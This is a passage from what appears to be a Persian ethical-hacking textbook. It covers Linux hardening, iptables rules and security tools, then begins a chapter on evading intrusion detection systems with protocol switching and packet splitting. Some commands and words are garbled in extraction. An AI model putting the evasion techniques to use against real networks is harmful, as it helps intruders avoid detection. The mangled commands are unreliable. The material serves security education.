ﻟﻴﻨﻮﻛﺲ ﺑﻪ ﻋﻨﻮان ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ اﻣﻦ ﺷﻨﺎﺧﺘﻪ ﻧﻤﻲ ﺷﻮد ﭼﻮن ﻛﺪ آن در دﺳﺘﺮس اﺳﺖ و ﻳﺎﻓﺘﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺳﻴﺴﺘﻢ راﺣﺖ ﺗﺮ ﻣﻲ ﺷﻮد . و ﻧﻴﺰ ﺑﺴﻴﺎري از ﺑﺮﻧﺎﻣﻪ ﻫﺎ در ﻟﻴﻨﻮﻛﺲ، ﺑﺼﻮرت ﭘﻴﺶ ﻓﺮض ﻧﺼﺐ ﻣﻲ ﺷﻮﻧﺪ ﻫﻤﻴﻦ ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ آﺳﻴﺐ ﭘﺬﻳﺮي آن ﺑﻴﺸﺘﺮ ﺷﻮد و اﻣﻨﻴﺖ آن از ﻛﺎرﺑﺮي ﺑﻪ ﻛﺎرﺑﺮ دﻳﮕﺮ ﻣﺘﻔﺎوت ﺑﺎﺷﺪ . .

207

روش ﻫﺎي اﻣﻦ ﺳﺎزي ﻟﻴﻨﻮﻛﺲ

اﻣﻦ ﺳﺎزي ( hardening) ، ﻓﺮآﻳﻨﺪ ﺑﻬﺒﻮد اﻣﻨﻴﺖ روي ﺳﻴﺴﺘﻢ ﺑﺎ اﻳﺠﺎد اﺻﻼﺣﺎﺗﻲ در آن اﺳﺖ . ﺑﺎ اﺟﺮاي ﻳﻜﺴﺮي از روش ﻫﺎي اﻳﻤﻦ ﺳﺎزي، ﻟﻴﻨﻮﻛﺲ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺴﻴﺎر اﻣﻦ ﺷﻮد . اوﻟﻴﻦ ﮔﺎم در اﻣﻦ ﺳﺎزي ﺳﺮور، ﻟﻴﻨﻮﻛﺲ ﻳﺎ وﻳﻨﺪوز، اﻳﻦ اﺳﺖ ﻛﻪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﻛﻪ آن در ﻣﻜﺎن اﻣﻨﻲ ﻗﺮار دارد ﻣﺜﻼ در ﻣﺮﻛﺰ ﻋﻤﻠﻴﺎت ﺷﺒﻜﻪ . ﻛﻪ اﺟﺎزه دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻫﻜﺮ ﺑﻪ ﺳﻴﺴﺘﻢ را ﻣﻲ ﮔﻴﺮد . .

دوﻣﻴﻦ و واﺿﺢ ﺗﺮﻳﻦ ﻣﻌﻴﺎر اﻣﻨﻴﺘﻲ، اﺳﺘﻔﺎده از ﭘﺴﻮرد ﭘﻴﭽﻴﺪه اﺳﺖ . ﻣﺪﻳﺮان ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻨﺪ ﻛﻪ ﭘﺴﻮرد ﺳﻴﺴﺘﻢ ﻫﺎ، null ﻧﻴﺴﺖ اﻳﻨﻜﺎر ﺑﺎ ﺑﺮرﺳﻲ اﻛﺎﻧﺖ ﻫﺎي ﻛﺎرﺑﺮ در ﻓﺎﻳﻞ etc/shadow/ اﻣﻜﺎن ﭘﺬﻳﺮ اﺳﺖ . .

وﺿﻌﻴﺖ اﻣﻨﻴﺘﻲ ﭘﻴﺶ ﻓﺮض ﻛﻪ ﺑﺼﻮرت deny all اﺳﺖ ﺑﺮاي اﻣﻦ ﺳﺎزي ﻳﻚ ﺳﻴﺴﺘﻢ از ﻳﻚ ﺣﻤ ﻠﻪ ﺷﺒﻜﻪ اي ﻣﻨﺎﺳﺐ اﺳﺖ . ﺑﻌﺪ از ﺑﻜﺎر ﺑﺮدن deny all ، ﻣﺪﻳﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﻛﺎرﺑﺮ ﺧﺎﺻﻲ، دﺳﺘﺮﺳﻲ را ﺑﺎز ﻛﻨﺪ . ﺑﺎ اﺳﺘﻔﺎده از دﺳﺘﻮر deny all ، ﻣﺪﻳﺮان ﻣﻄﻤﺌﻦ ﻣﻲ ﺷﻮﻧﺪ ﻛﻪ ﻛﺎرﺑﺮان ﺑﻪ ﻓﺎﻳﻞ ﻫﺎﻳﻲ ﻛﻪ اﺟﺎزه دﺳﺘﺮﺳﻲ ﻧﺪارﻧﺪ، دﺳﺘﺮﺳﻲ ﻧﺪارﻧﺪ . دﺳﺘﻮر ﺟﻠﻮﮔﻴﺮي از دﺳﺘﺮﺳﻲ ﻛﺎرﺑﺮان ﺑﻪ ﺷﺒﻜﻪ ﺑﺼﻮ رت زﻳﺮ اﺳﺖ : :

Cat "All:All>> /etc/hosts.deny

ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻟﻴﻨﻮﻛﺲ، ﺗﻌﺪادي ﻣﻜﺎﻧﻴﺰم ﻣﺤﺎﻓﻈﺖ ﺗﻮﻛﺎر دارد ﻛﻪ ﺑﺎﻳﺪ ﺑﺎ ﺗﻐﻴﻴﺮ ﭘﺎراﻣﺘﺮﻫﺎي ﻛﺮﻧﻞ ﺳﻴﺴﺘﻢ در proc filesystem/ از ﻃﺮﻳﻖ ﻓﺎﻳﻞ etc/sysctl.conf/ آﻧ ﻬﺎ را ﻓﻌﺎل ﻛﻨﻴﺪ . .

روش ﻫﺎي دﻳﮕﺮ ﺑﺮاي اﻣﻦ ﺳﺎزي ﺳﺮور ﻟﻴﻨﻮﻛﺲ، ﭘﺎك ﻛﺮدن ﺳﺮو ﻳﺲ ﻫﺎي ﻏﻴﺮ ﻣﻮرد اﺳﺘﻔﺎده و اﻃﻤﻴﻨﺎن از ﺑﻪ روز ﺑﻮدن ﺳﻴﺴﺘﻢ ﻫﺎ ﺑﺎ آﺧﺮﻳﻦ patch ﻫﺎ اﺳﺖ . ﻫﻤﭽﻨﻴﻦ ﻣﺪﻳﺮان ﺑﺎﻳﺪ ﻻگ ﻫﺎي ﺳﻴﺴﺘﻢ را ﺑﺼﻮرت ﻣﺮﺗﺐ ﺑﺮرﺳﻲ ﻛﻨﻨﺪ ﺗﺎ رﺧﺪادﻫﺎي ﻏﻴﺮﻣﻌﻤﻮل را ﻛﻪ ﻧﺸﺎﻧﻪ اي از ﺣﻤﻠﻪ ﻫﺴﺘﻨﺪ را ﺑﺒﻴﻨﺪ . .

208

اﻗﺪاﻣﺎت دﻳﮕﺮي ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي اﻣﻦ ﺳﺎزي ﻳﻚ ﺳﺮور ﻟﻴﻨﻮﻛﺲ اﻧ ﺠﺎم ﺷﻮﻧﺪ ﻋﺒﺎرﺗﻨﺪ از : :

• اﺳﺘﻔﺎده از ﺗﻮزﻳﻊ ﺷﻨﺎﺧﺘﻪ ﺷﺪه و ﺧﻮب ﻟﻴﻨﻮﻛﺲ • ﻋﺪم ﻧﺼﺐ ﺑﺮﻧﺎﻣﻪ ﻫﺎ و ﺳﺮوﻳﺲ ﻫﺎي ﻏﻴﺮ ﺿﺮوري • ﺗﻐﻴﻴﺮ ﭘﺴﻮردﻫﺎي ﭘﻴﺶ ﻓﺮض • ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن دﺳﺘﺮﺳﻲ از راه دور • راه اﻧﺪازي و ﻓﻌﺎﻟﺴﺎزي IP tables • ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎن ( HIDS) • اﺳﺘﻔﺎده از ﻓﺎﻳﻞ ﻫﺎي ﻻگ . .

ﻓﺎﻳﺮوال در ﻟﻴﻨﻮﻛﺲ ( IPTable ) )

IPTable ، ﺟﺎﻳﮕﺰﻳﻦ اﺑﺰار ipchains ﻫﺎ در ﻛﺮﻧﻞ ﻟﻴﻨﻮﻛﺲ اﺳﺖ و داراي ﻗﺎﺑﻠﻴﺖ ﻫﺎي ﻓﺮاواﻧﻲ اﺳﺖ . ﺗﻮاﻧﺎﻳﻲ ردﮔﻴﺮي ارﺗﺒﺎﻃﺎت، ﺳﺒﺐ ﻧﻈﺎرت statful ﺑﺴﺘﻪ ﻣﻲ ﺷﻮد . در زﻳﺮ، ﺑﺮﺧﻲ از ﻣﺜﺎل ﻫﺎي آن آورده ﺷﺪه اﺳﺖ : : iptables –A INPUT –s 0/0 –i eth0 –d 192.168.1.1 –p TCP –j ACCEPT

ﺑﺎ اﻳﻦ دﺳﺘﻮر، ﺑﻪ ﻓﺎﻳﺮوال اﺟﺎزه داده ﻣﻲ ﺷﻮد ﻛﻪ ﺗﻤﺎم ﺑﺴﺘﻪ ﻫﺎﻳﻲ ﻛﻪ از اﻳﻨﺘﺮﻓﻴﺲ eth0 از ﻫﺮ آدرس IP ﻣﻲ آﻳﻨﺪ، ﺑﻪ آدرس IP ﻓﺎﻳﺮوال ﻛﻪ 192,168,1,1 اﺳﺖ، ﻣﻘﺼﺪدﻫﻲ ﺷﻮﻧﺪ . .

iptables –A OUTPUT –p icmp –icmp-type echo-request –j ACCEPT

ﺑﺎ اﻳﻦ دﺳﺘﻮر، ﺑﻪ ﻓﺎﻳﺮوال اﺟﺎزه داده ﻣﻲ ﺷﻮد ﻛﻪ ping ) ICMP echo-request ) را ارﺳﺎل ﻛﻨﺪ و ﺑﺴﺘﻪ ﻫﺎي ﭘﺎﺳﺦ ICMP را درﻳﺎﻓﺖ ﻛﻨﺪ . .

اﺑﺰارﻫﺎي ﻟﻴﻨﻮﻛﺲ Security Auditor’s Research Assistant ) SARA) ، ﻧﺴﻞ ﺳﻮم از اﺑﺰار ﻫﺎي ﺗﺤﻠﻴﻞ اﻣﻨﻴﺘﻲ اﺳﺖ ﻛﻪ ﺑﺮ ﭘﺎﻳﻪ ﻳﻮﻧﻴﻜﺲ ﻣﻲ ﺑﺎﺷﺪ . اﻳﻦ اﺑﺰار، در ﭘﻠﺖ ﻓﺮم ﻫﺎي ﻣﺨﺘﻠﻒ از ﻗﺒﻴﻞ ﻟﻴﻨﻮﻛﺲ و MAC OS اﺳﺖ . .

Tcpdump ، اﺑﺰاري ﻗﺪرﺗﻤﻨﺪ ﺑﺮاي ﻣﺎﻧﻴﺘﻮرﻳﻨﮓ ﺷﺒﻜﻪ و داده ﻫﺎ اﺳﺖ . ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ از اﻳﻦ اﺑﺰار ﺑﺮاي ﺣﻞ ﻣﺸﻜﻼت ﺷﺒﻜﻪ، ﺑﺮاي ﺷ ﻨﺎﺳﺎﻳﻲ ﺣﻤﻼت ping ﻳﺎ ﻣﺎﻧﻴﺘﻮر ﻛﺮدن ﻓﻌﺎﻟﻴﺖ ﻫﺎي ﺷﺒﻜﻪ اي اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

Snort ، ﻳﻚ اﺳﺘﺮاق ﺳﻤﻊ ﻛﻨﻨﺪه ﺑﺴﺘﻪ اﺳﺖ ﻛﻪ ﺣﻤﻼت را ﺷﻨﺎﺳﺎﻳﻲ و ﺛﺒﺖ ﻣﻲ ﻛﻨﺪ . اﻳﻦ اﺑﺰار، داراي ﻗﺎﺑﻠﻴﺖ ﻫﺸﺪار دﻫﻲ اﺳﺖ ﻛﻪ ﺑﻪ syslog ارﺳﺎل ﻣﻲ ﺷﻮد . . 209

Netcat ، ﺑﻪ ﻋﻨﻮان اﺑﺰار آﭼﺎر ﺳﻮﺋﻴﺴﻲ ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد ﻛﻪ داده ﻫﺎ را از ﻃﺮﻳﻖ ارﺗﺒﺎﻃﺎت ﺷﺒﻜﻪ اي ﺑﺎ اﺳﺘﻔﺎده از ﭘﺮوﺗﻜﻞ TCP ﻳﺎ UDP ﻣﻲ ﺧﻮاﻧﺪ ﻳﺎ ﻣﻲ ﻧﻮﻳﺴﺪ . ﺑﺎ اﻳﻦ اﺑﺰار ﻣﻲ ﺗﻮاﻧﺪ ﺗﻘﺮﻳﺒﺎ ﻫﺮ ﻧﻮع ارﺗﺒﺎﻃﻲ را ﻛﻪ ﻧﻴﺎز دارﻳﺪ، اﻳﺠﺎد ﻛﻨﻴﺪ و ﻧﻴﺰ داراي ﻗﺎﺑﻠﻴﺘﻬﺎي ﺟﺎﻟﺐ دﻳﮕﺮي ﻫﻢ اﺳﺖ . .

SAINT ، اﺑﺰاري ﺑﺮاي ارزﻳﺎﺑﻲ اﻣﻨﻴﺘﻲ اﺳﺖ ﻛﻪ ﻣﺒﺘﻨﻲ ﺑﺮ SATAN اﺳﺖ . ﻗﺎﺑﻠﻴﺖ ﻫﺎﻳﻲ ﻫﻤﭽﻮن اﺳﻜﻦ از ﻃﺮﻳﻖ ﻓﺎﻳﺮوال، ﺑﺮرﺳﻲ ﻫﺎي ( check ) اﻣﻨﻴﺘﻲ ﺑﻪ روز ﺷﺪه دارد ﻛﻪ داراي ﭼﻬﺎر ﺳﻄﺢ اﻣﻨﻴﺘﻲ ( ﻗﺮﻣﺰ، زرد، ﻗﻬﻮه اي، ﺳﺒﺰ ) ﻣﻲ ﺑﺎﺷﺪ . .

Wireshark : ﻧﺮم اﻓﺰار آﻧﺎﻟﻴﺰ ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي ﻳﻮﻧﻴﻜﺲ و ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ اﺳﺖ و داراي راﺑﻂ ﮔﺮاﻓﻴﻜﻲ اﺳﺖ . .

دﻳﮕﺮ اﺑﺰارﻫﺎي اﻣﻨﻴﺘﻲ ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻟﻴﻨﻮﻛﺲ ﻋﺒﺎرﺗﻨﺪ از : : Hunt ، LIDS ، IPTraf ، LSOF ، Nemesis ، Sniffit ، Hping2 ، Abacus Port Sentry ، و ... .

210

ﻓﺼﻞ ﺳﻴﺰدﻫﻢ

ﮔﺮﻳﺰ از IDS ﻫﺎ، honeypot ﻫﺎ و ﻓﺎﻳﺮوال ﻫﺎ ﻫﺎ

ﻣﻘﺪﻣﻪ

ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ( IDS) ، ﻓﺎﻳﺮوال ﻫﺎ ، و honeypot ﻫﺎ ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﻤﺎ را ﻣﻄﻤﺌﻦ ﻣﻲ ﻧﺳﺎز ﺪ ﻫﻜﺮ ﻧﻤﻲ ﺗﻮاﻧﺪ ﺑﻪ ﺷﺒﻜﻪ ﻳﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ دﺳﺘﺮﺳﻲ اﺪﻴﭘ .ﺪﻨﻛ ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ( IDS ) و ﻓﺎﻳﺮوال ﻫﺎ ، ﻫﺎ ﺟﺰ دﺳﺘﮕﺎه ﻫﺎي ﻓﻴﻠﺘﺮﻳﻨﮓ ﺑﺴﺘﻪ ﻫﺴﺘﻨﺪ و ﺑﺮ اﺳﺎس ﻗﻮاﻧﻴﻦ از ﭘﻴﺶ ﻧﻮﺷﺘﻪ ﺷﺪه، ﺗﺮاﻓﻴﻚ را ﻣﺎﻧﻴﺘﻮر ﻣﻲ ﻨﻛ .ﻨﺪ .ﻨﺪ honeypot ، ﻳﻚ ﺳﻴﺴﺘﻢ ﻫﺪف ﺟﻌﻠﻲ اﺳﺖ ﻛﻪ ﺑﻪ ﻋﻨﻮان ﻃﻌﻤﻪ اي ﺑﺮاي ﻫﻜﺮ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد ﺗﺎ او را از دﺳﺘﺮﺳﻲ ﺑﻪ اﻫﺪاف ﺑﺎ ارزش دور ﻧﮕﻪ دارد . ﺑﻪ ﻋﻨﻮان ﻳﻚ ﻛﺎر ﺷﻨﺎس اﻣﻨﻴﺘﻲ، ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ ﻧﺤﻮه ﻛﺎرﻛﺮد و اﻳﺠﺎد اﻣﻨﻴﺖ ﺗﻮﺳﻂ آﻧﻬﺎ آﺷﻨﺎ ﺑﺎﺷﻴﺪ . .

اﻧﻮاع ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ و ﺗﻜﻨﻴﻚ ﻫﺎي ﮔﺮﻳﺰ

ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ، ﺳﻴﺴﺘﻢ ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﺮاﻓﻴﻚ را ﻣﺎﻧﻴﺘﻮر ﻣﻲ ﻛﻨﻨﺪ و signature ﺣﻤﻼت ﻳﺎ اﻟﮕﻮﻫﺎي رﻓﺘﺎري ﻏﻴﺮﻣﻌﻤﻮل را ﻛﺸﻒ ﻣﻲ ﻛﻨﻨﺪ . ﻳﻜﻲ از ﻋﻨﺎﺻﺮ IDS ﻫﺎ، packet sniffer ﻫﺎ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﺮاﻓﻴﻚ را ﻣﺎﻧﻴﺘﻮر ﻣﻲ ﻨﻛ .ﻨﺪ زﻣﺎﻧﻴﻜﻪ رﺧﺪادي در ﻟﻴﺴﺖ event اﻣﻨﻴﺘﻲ ﺷﺮﻛﺖ ﺛﺒﺖ ﺷﻮد، IDS ، ﭘﻴﻐﺎم ﻫﺸﺪاري از ﻃﺮﻳﻖ اﻳﻤﻴﻞ، pager ، ﻳﺎ ﺗﻠﻔﻦ ﻫﻤﺮاه ﺑﻪ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ ارﺳﺎل ﻣﻲﻛ ﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﺗﺮاﻓﻴﻚ ﻣﺸﻜﻮﻛﻲ در ﺣﺎل ﻋﺒﻮر ﺑﺎﺷﺪ، ﺳﻴﺴﺘﻢ ﻫﺎي ﺟﻠﻮﮔﻴﺮي از ﺣﻤﻠﻪ ( IPS) ، اﻗﺪاﻣﺎﺗﻲ از ﻗﺒﻴﻞ ﺑﻠﻮﻛﻪ ﻛﺮدن ﺗﺮاﻓﻴﻚ و ... را اﻧﺠﺎم ﻣﻲ .ﺪﻨدﻫ زﻣﺎﻧﻴﻜﻪ ﺗﻼﺷﻲ ﺑﺮاي ﻧﻔﻮذ مﺎﺠﻧا ﻣ ﻲﺷ ،دﻮ ،دﻮ ﺳﻴﺴﺘﻢ ﻫﺎي IPS ، ﺑﺼﻮرت اﺗﻮﻣﺎﺗﻴﻚ، از ﺑﺮوز ﺣﻤﻠﻪ ﺟﻠﻮﮔﻴﺮي ﻣﻲ ﻛﻨﻨﺪ . .

دو ﻧﻮع ﺳﻴﺴﺘﻢ ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ( IDS ) وﺟﻮد دارد : :

Host-based: ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ﻣﺒﺘﻨﻲ ﺑﺮ نﺎﺑﺰﻴﻣ ( HIDS) ، ﺑﺮﻧﺎﻣﻪ ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮ روي ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻣﻲ ﺷﻮﻧﺪ و ﺗﺮاﻓﻴﻚ ﻳﺎ روﻳﺪادﻫﺎ را ﺑﺮ اﺳﺎس ﻟﻴﺴﺘﻲ از اﻣﻀﺎﻫﺎي ﺷﻨﺎﺧﺘﻪ ﺷﺪه ﺑﺮاي آن ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، ﻓﻴﻠﺘﺮ ﻣﻲ ﺪﻨﻛﻨ . اﻳﻦ ﺳﻴﺴﺘﻢ ﻫﺎ، agent ﻫﺎي Norton Internet Security و Cisco Security را دارﻧﺪ . .

ﻫﺸﺪار : ﺑﺴﻴﺎري از وﻳﺮوس ﻫﺎ و worm ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ HIDS را ﺧﺎﻣﻮش ﻛﻨﻨﺪ . .

212

Network-based: ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ﺷ ﺒﻜﻪ اي ( NIDS) ، دﺳﺘﮕﺎه ﻫﺎي ﻧﺮم اﻓﺰاري ﻫﺴﺘﻨﺪ ﻛﻪ در ﺷﺒﻜﻪ ﻗﺮار ﻣﻲ ﮔﻴﺮﻧﺪ . اﻳﻦ دﺳﺘﮕﺎه ﻫﺎ، ﺗﻨﻬﺎ ﺑﻪ ﻣﻨﻈﻮر ﺷﻨﺎﺳﺎﻳﻲ اﻧﻮاع ﺗﺮا ﻓﻴﻚ ﺷﺒﻜﻪ اي ﻣﺨﺮب ﻛﻪ ﺗﻮﺳﻂ ﻓﺎﻳﺮوال ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻴﺴﺘﻨﺪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ . ﺗﺮاﻓﻴﻚ ﻫﺎي ﻣﺨﺮب ﺷﺎﻣﻞ ﺣﻤﻼت ﺑﺮ ﻋﻠﻴﻪ ﺳﺮوﻳﺲ ﻫﺎي آﺳﻴﺐ ﭘﺬﻳﺮ، ﺣﻤﻼت داده ﺑﺮ روي ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻛﺎرﺑﺮدي، ﺣﻤﻼت ﻣﺒﺘﻨﻲ ﺑﺮ نﺎﺑﺰﻴﻣ از ﻗﺒﻴﻞ اﻓﺰاﻳﺶ دﺳﺘﺮﺳﻲ، ﺎﻫدورو ي ﻏﻴﺮﻣﺠﺎز و دﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻞ ﻫﺎي ﺣﺴﺎس، و malware ﻫﺎ ﻣﻲ ﺷﻮﻧﺪ . اﻳﻦ ﺳﻴﺴﺘﻢ ﻫﺎ، ﺳﻴﺴﺘﻢ ﻫﺎي ﭘﺴﻴﻮ ﻫﺴﺘﻨﺪ . ﺳﻨﺴﻮر IDS ، ﻳﻚ ﻧﻔﻮذ اﻣﻨﻴﺘﻲ ﺑﺎﻟﻘﻮه را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ، اﻃﻼﻋﺎت را ﺛﺒﺖ ﻣﻲ ﻛﻨﺪ، و ﻫﺸﺪاري ﺑﻪ ﻛﻨﺴﻮ ل ﺘﻳﺮﻳﺪﻣ ﻲ ارﺳﺎل ﻣﻲ ﻛﻨﺪ . .

ﻣﻜﺎن IDS در ﺷﺒﻜﻪ

اﺑﺰارﻫﺎي ﻫﻚ Snort ، ﻳﻚ ﻧﺮم اﻓﺰار اﺳﺘﺮاق ﺳﻤﻊ ﻛﻨﻨﺪه ﺑﻼدرﻧﮓ ﺑﺴﺘﻪ ﻫﺎ، HIDS ، و اﺑﺰار ﺛﺒﺖ ﺗﺮاﻓﻴﻚ اﺳﺖ ﻛﻪ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺎي ﻟﻴﻨﻮﻛﺲ و وﻳﻨﺪوز ﻧﺼﺐ ﻣﻲ ﺷﻮد . ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ ﻗﻮاﻧﻴﻦ Snort و IDS را در ﻓﺎﻳﻞ snort.conf ، ﭘﻴﻜﺮﺑﻨﺪي ﻛﻨﻴﺪ . دﺳﺘﻮر ﻧﺼﺐ و اﺟﺮاي snort ﺑﻪ ﺻﻮرت زﻳﺮ اﺳﺖ : : Snort –l c:\snort\log –c C:\snort\etc\snoft.conf –A console

BlackICE ، داراي ﺳﻴﺴﺘﻢ ﺗﺸﺨﻴﺺ ﻧﻔﻮذي اﺳﺖ ﻛﻪ درﺑﺎره ﺣﻤﻼت ﻫﺸﺪار ﻣﻲ دﻫﺪ و در ﺑﺮاﺑﺮ ﺗﻬﺪﻳﺪات ﺑﺮ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﻫﺎ، ﻣﻘﺎوﻣﺖ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻧﺮم اﻓﺰار، از ﺳﻴﺴﺘﻢ ﻫﺎي وﻳﻨﺪوزي ( ﻛﻼﻳﻨﺘﻲ و ﺳﺮوري ) ﻣﺤﺎﻓﻈﺖ ﻣﻲ ﻛﻨﺪ . .

IDS ﻫﺎي دﻳﮕﺮ ﻋﺒﺎرﺗﻨﺪ از : RealSecure ، Lucent RealSecure ، eTrust Internet Defense ، Dragon Sensor . .

213

ﺳﻴﺴﺘﻢ ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ( IDS ياﺮﺑ) ﺸﺗ ﻴﺨ ﺺ ﺣ ،ﻪﻠﻤ زا signature analysis ﻳﺎ anomaly detection هدﺎﻔﺘﺳا هدﺎﻔﺘﺳا .ﺪﻨﻛ ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺸﺨﻴﺺ signature ، ﺗﺮاﻓﻴﻚ را ﺑﺎ signature ﻫﺎي ﺷﻨﺎﺧﺘﻪ ﺷﺪه و اﻟﮕﻮﻫﺎي ﺳﻮ اﺳﺘﻔﺎده، ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﻛﻨﺪ . Signature ، اﻟﮕﻮﻳﻲ اﺳﺖ ﻛﻪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻳﻚ ﻳﺎ ﻣﺠﻤﻮﻋﻪ اي از ﺑﺴﺘﻪ ﻫﺎ ﻛﻪ ﺑﺮاي ﺣﻤﻠﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ، اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﺑﺮاي ﻣﺜﺎل، ﻳﻚ IDS ﻛﻪ وب ﺳﺮورﻫﺎ را ﻛﻨﺘﺮل ﻣﻲ ﻛﻨﺪ، ﻣﻤﻜﻦ اﺳﺖ ﺑﻪ دﻧﺒﺎل رﺷﺘﻪ phf ﺑﮕﺮدد ﺑﺮاي اﻳﻨﻜﻪ ﻧﺸﺎن دﻫﻨﺪه ﺣﻤﻠﻪ CGI اﺳﺖ . اﻣﺎ ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذي ﻛﻪ از anomaly detection اﺳﺘﻔﺎده ﻣﻲ ﻨﻛﻨ ﺪ، ﺑﻪ دﻧﺒﺎل ﺗﻼش ﻫﺎي ﺣﻤﻠﻪ ﺑﺮ ﻣﺒﻨﺎي اﻟﮕﻮﻫﺎي ﻃﺒﻴﻌﻲ ا ﺷﺨﺎص ﻣﻲ ﮔﺮدﻧ ﺪ و زﻣﺎﻧﻴﻜﻪ رﻓﺘﺎر ﻏﻴﺮﻃﺒﻴﻌﻲ در دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎ، ﻓﺎﻳﻞ ﻫﺎ، و ﻻﮔﻴﻦ ﻫﺎ ﻣﺸﺎﻫﺪه ﻨﻛﻨ ﺪ، آن را ﮔﺰارش ﻣﻲ .ﺪﻨﻨﻛ .ﺪﻨﻨﻛ

ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ ﺗﻐﻴﻴﺮ ﺗﺮاﻓﻴﻚ، از IDS ﻋﺒﻮر ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﻧﻤﻲ ﺗﻮاﻧﺪ ﺗﺮاﻓﻴﻚ را ﺑﺎ signature ﺷﻨﺎﺧﺘﻪ ﺷﺪه اي ﻣﻘﺎﻳﺴﻪ ﻛﻨﺪ . اﻳﻦ اﻣﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ اﺳﺘﻔﺎده از ﺟﺎﻳﮕﺰﻳﻨﻲ ﭘﺮوﺗﻜﻞ UDP ﺑﻪ ﺟﺎي TCP ، و ﻳﺎ HTTP ﺑﻪ ﺟﺎي ICMP اﻧﺠﺎم ﮔﻴﺮد . ﻋﻼوه ﺑﺮ اﻳﻦ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ ﺣﻤﻠﻪ را ﺑﻪ ﭼﻨﺪ ﺑﺴﺘﻪ ﻛﻮﭼﻚ ﺑﺸﻜﻨﺪ ﺗﺎ از IDS ﻋﺒﻮر ﻛﻨﺪ اﻣﺎ ز ﻣﺎﻧﻴﻜﻪ در ﻣﻘﺼﺪ، دوﺑﺎره ﺟﻤﻊ ﻣﻲ ﺷﻮﻧﺪ، ﻧﺘﻴﺠﻪ آن ﺑﺮاي ﺳﻴﺴﺘﻢ ﺧﻄﺮﻧﺎك ﺑﺎﺷﺪ . اﻳﻦ ﻛﺎر ﺑﺎ ﻧﺎم session plicing ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . ﺑﺮﺧﻲ دﻳﮕﺮ از روش ﻫﺎي ﮔﺮﻳﺰ از ﺷﻨﺎﺳﺎﻳﻲ، ﻋﺒﺎرﺗﻨﺪ از وارد ﻛﺮدن داده ﻫﺎي زﻳﺎد، اﺳﺘﻔﺎده از رﻣﺰﮔﺬاري ﺑﺮاي داده ﻫﺎ ﻳﺎ 